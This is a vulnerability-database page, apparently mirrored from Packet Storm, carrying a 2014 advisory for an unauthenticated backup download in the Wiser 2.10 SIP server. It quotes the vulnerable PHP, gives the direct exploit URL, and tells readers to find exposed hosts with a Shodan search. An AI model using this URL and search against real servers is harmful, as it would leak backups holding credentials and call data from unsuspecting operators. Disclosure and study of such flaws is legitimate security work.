Lucene search
K

Wiser 2.10 Backup Disclosure

🗓️ 19 May 2014 00:00:00Reported by AtT4CKxT3rR0r1STType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Wiser 2.10 SIP server backup download vulnerability in baixarBackup.ph

Code
`Wiser 2.10 [SIP SERVER] - Backup download vulnerability  
===================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [[email protected]] , [[email protected]]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://www.develsistemas.com.br/  
####################################################################  
VULNERABILITY  
##############  
/var/www/html/voip/sipserver/class/baixarBackup.php  
  
Line 3:  
  
require_once '/var/www/html/voip/sipserver/class/conexao.php';  
  
Line 55-59:  
  
function buscaBackup() {  
$this->conectarSer();  
$sql = "SELECT patch FROM backup WHERE patch IS NOT NULL ORDER BY  
id DESC LIMIT 1";  
$result = mysql_query($sql);  
return $result ? (mysql_num_rows($result)>0 ? mysql_result  
($result, 0, 'patch') : false) : false;  
  
#########  
EXPLOIT  
#########  
  
http://IP/voip/sipserver/class/baixarBackup.php  
  
[Note]: To Find This Ip Go To shodanhq.com And Type Location:  
voip/sipserver/login In Search Box  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 May 2014 00:00Current
7.4High risk
Vulners AI Score7.4
26